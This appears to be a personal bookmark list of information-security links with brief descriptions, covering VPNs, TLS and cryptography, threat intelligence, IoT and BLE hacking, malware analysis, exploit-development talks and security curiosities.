- Request Tracker for Incident Response
- Introducing Inkdrop 4
- AntiCheat-Testing-Framework: Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. All this code is the result of a research done for Recon2019 (Montreal).
- IronPython, darkly: how we uncovered an attack on government entities in Europe
- inlets: Expose your local endpoints to the Internet
- Projects released by the Team intelstorm, papers
- Pwnagotchi: (⌐■_■) - Deep Reinforcement Learning vs WiFI
- spyse.py: Python API wrapper and command-line client for the tools hosted on spyse.com.
- jigsaw project by Alphabet/Google. Outline: VPN Server.
- SSHuttle: Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
- WireGuard: is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
- Crockford’s base 32 encoding: Crockford’s base 32 encoding is a compromise between efficiency and human legibility.
- Sputnik -An Open Source Intelligence Browser Extension
- PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
- uncaptcha2: defeating the latest version of ReCaptcha with 91% accuracy
- Nefarious LinkedIn: A look at how LinkedIn spies on its users.
- Explain Shell
- Examples of regular expressions
- A tcpdump Tutorial and Primer with Examples
- Capture WiFi / WLAN / 802.11 Probe Request with tcpdump
- A curated list of awesome Threat Intelligence resources
- Looking for value in EV Certificates
- How to find hidden cameras
- the Simple Encrypted Arithmetic Library (SEAL): This repository is a fork of Microsoft Research's homomorphic encryption implementation
- A port of ChibiOS to the Orchard radio platform
- Decent Security: Everyone can be secure.
- Introducing Certificate Transparency and Nimbus
- trillian: Trillian implements a Merkle tree whose contents are served from a data storage layer, to allow scalability to extremely large trees.
- CFSSL's CA trust store repository
- A Few Thoughts on Cryptographic Engineering
- Mailfence
- Threat Hunting Workshop - Methodologies for Threat Analysis
- Xoodoo
- CoPilot is a wireless hotspot for digital security trainers that provides an easy to use web interface for simulating custom censorship environments during trainings.
- AgentMaps: Make social simulations on interactive maps with Javascript!
- flowsscripts: Miner pools ips.
- SwiftFilter: Exchange Transport rules to detect and enable response to phishing
- The Illustrated TLS Connection: Every Byte Explained
- Practical Cryptography
- Thieves and Geeks: Russian and Chinese Hacking Communities
- ephemera-miscellany: Ephemera and other documentation associated with the 1337list project.
- The New Illustrated TLS Connection
- CleverHans: An adversarial example library for constructing attacks, building defenses, and benchmarking both
- How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists
- HTTP/3 Explained - github/http2 explained - github
- The Practical Guide to Hacking Bluetooth Low Energy
- A Practical Guide to BLE Throughput
- Exploiting IoT enabled BLE smart bulb security
- security: Discussion area for security aspects of ECMAScript
- Template for Data Protection Impact Assessment (DPIA)
- hash collisions exploitation and other pocs, a script to collide PDFs
- Shodan - A tool for Security and Market Research
- Engineering Security: general book about a range of topics in security.
- (ru) Плакаты по информационной безопасности Российской армии: Russian counter information posters.
- Kerberos (I): How does Kerberos work? – Theory
- Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs.
- Vulncode-DB project: The vulnerable code database (Vulncode-DB) is a database for vulnerabilities and their corresponding source code if available.
- One-End Encryption (OEE): Stronger than End-to-End Encryption
- Configuring MTA-STS and TLS Reporting For Your Domain
- Automatic SSL with Now and Let's Encrypt
- Hacking Digital Calipers
- Binary Hardening in IoT products: Last year, the team at CITL looked into the state of binary hardening features in IoT firmware.
- ZigDiggity: A ZigBee hacking toolkit by Bishop Fox.
- Security Guidelines for Congressional Campaigns
- From Assembly to JavaScript and back (OffensiveCon2018)
- Kudelski Security's 2018 pre-Black Hat crypto challenge
- Black Hat 2018: Expert demonstrated a new PHP code execution attack
- [DEFCON 2018] Doublethink: 8-Architecture Assembly Polyglot by Robert Xiao
- ARM-based IoT Exploit Development
- (pt-br)Uma Introdução a Threat Intelligence e Threat Hunting para Empresas Sem Orçamento Infinito
- Outflank Presentations
- The Art of De-obfuscation
- H2HC - Hackers To Hackers Conference:
- SBSeg 2018: Simpósio Brasileiro em Segurança da Informação e de Sistemas Computacionais (SBSeg)
- Smartphone Privacy: How Your Smartphone Tracks Your Entire Life
- Fun with LDAP and Kerberos- in AD environments
- Analysis and recommendations for standardization in penetration testing and vulnerability assessment
- The Second Crypto War—What's Different Now (by Susan Landau, Bridge Professor of Cyber Security and Policy, Tufts University)
- Objective by the Sea (2018):
- APFS Internals - Jonathan Levin
- Protecting the Garden of Eden - Patrick Wardle
- Code signing flaw in macOS - Thomas Reed
- From Apple Seeds to Apple Pie - Sarah Edwards
- When Macs Come Under ATT&CK - Richie Cyrus
- Crashing to Root - Bradon Azad
- Leveraging Apple's Game Engine for Advanced Threat Detection - Josh Stein / Jon Malm
- MacDoored - Jaron Bradley
- Who Moved my Pixels? - Mikahail Sosonkin
- Aliens Among Us - Michael Lynn
- BlackHoodie 2018 Workshop: An Introduction To Binary Exploitation
- Malware: Anti-forensics
- The 35C3 halfnarp
- SeL4-Enabled Security Mechanisms for Cyber-Physical Systems
- Mojave's Sandbox is Leaky
- Code Obfuscation 10**2+(2*a+3)%2
- DeepState: Bringing vulnerability detection tools into the development lifecycle, paper: DeepState: Symbolic Unit Testing for C and C++
- Hardware Memory Tagging to make C/C++ memory safe(r)
- wallet.fail: Hacking the most popular cryptocurrency hardware wallets
- Reverse Engineering: Closed, heterogeneous platforms and the defenders’ dilemma Looking back at the last 20 years of RE and looking ahead at the next few SSTIC 2018 -- Thomas Dullien (“Halvar Flake”)
- Making C Less Dangerous in the Linux kernel
- Modchips of the State: Hardware implants in the supply-chain - CCC 2018
- Workshop-BSidesMunich2018: ARM shellcode and exploit development - BSidesMunich 2018
- REhint's Publications.
- INFILTRATE 2019 Demo Materials
- A Practical Approach to Purple Teaming
- The Advanced Threats Evolution: REsearchers Arm Race by @matrosov
- The Beginner Malware Analysis Course + VirusBay Access
- MISP Summit 05: MISP Threat Intelligence Summit 0x05 at hack.lu 2019. Practical threat intelligence and information sharing for everyone.
- ConPresentations by Maddie Stone.
- Venturing into the Dark- a review of Dark Side Ops 2: Adversary Simulation
Some good places to visit:
- hasherezade's 1001 nights
- List of Helpful Information Security Multimedia
- pocorgtfo: a "PoC or GTFO" mirror with extra article index, direct links and clean PDFs.
- FIDO ECDAA Algorithm
- stamparm: Miroslav Stampar Repositories (a lot of good stuff)
- Github repos:
- Damn Vulnerable Web Application:
- Nelson Brito's Source: This repository is a collection of information, code and/or tool, which I've released and/or presented in some of the most notorious conferences, helping the audience to study and understand some cybersecurity related topics.
- (pt-br)PwnLab: init
- Mamont's open FTP Index: a lot of open FTPs!!!
- fuzz.txt: Potentially dangerous files
- Free Training: New Certified Learning Paths: The Qualys Training team is eager to share all of the recent additions to our free training program, as well as provide insight into what is coming in 2019. You can expect to see regular updates as we continue to improve our training offerings!
- Spoilerwall introduces a brand new concept in the field of network hardening
- abusing github commit history for the lulz
- resist_oped: 🕵🏽♀️ Identifying the author behind New York Time’s op-ed from inside the Trump White House.
- InfoSec BS Bingo
- How to fit all of Shakespeare in one tweet (and why not to do it!)
- Attrition.org: defacement rank.
- rot8000: rot13 for the Unicode generation (github)
- Reverse Engineering Pokémon GO Plus: TL;DR; You can clone a Pokemon GO Plus device that you own. pgpemu: github repo.
- grugq quotes
- Pivots & Payloads Board Game: Introducing the NEW SANS Pen Test Poster by SANS Institute
- Chess Steganography
- Enigma, the Bombe, and Typex
- (pt-br) Ícone da criptografia na 2ª Guerra Mundial, máquina Enigma tem exemplar no Brasil
- Enigma machine: This is a simulated Enigma machine. Letters to be encrypted enter at the boundary, move through the wire matrix, and exit.
- How I hacked modern Vending Machines
- A better zip bomb
- Goodbye-World: The last program that every developer writes.
- Dumb Password Rules
- Enigma I, Navy M3/M4 Machine Emulator.
- [1808.00659] Chaff Bugs: Deterring Attackers by Making Software Buggier
- [1809.08325] The Rise of Certificate Transparency and Its Implications on the Internet Ecosystem
- DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution
- Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities
- The Hunt for 3ve: Taking down a major ad fraud operation through industry collaboration.
- Page Cache Attacks: We present a new hardware-agnostic side-channel attack that targets one of the most fundamental software caches in modern computer systems: the operating system page cache.
- Identification and Illustration of Insecure Direct Object References and their Countermeasures
- China’s Maxim: Leave No Access Point Unexploited: The Hidden Story of China Telecom’s BGP Hijacking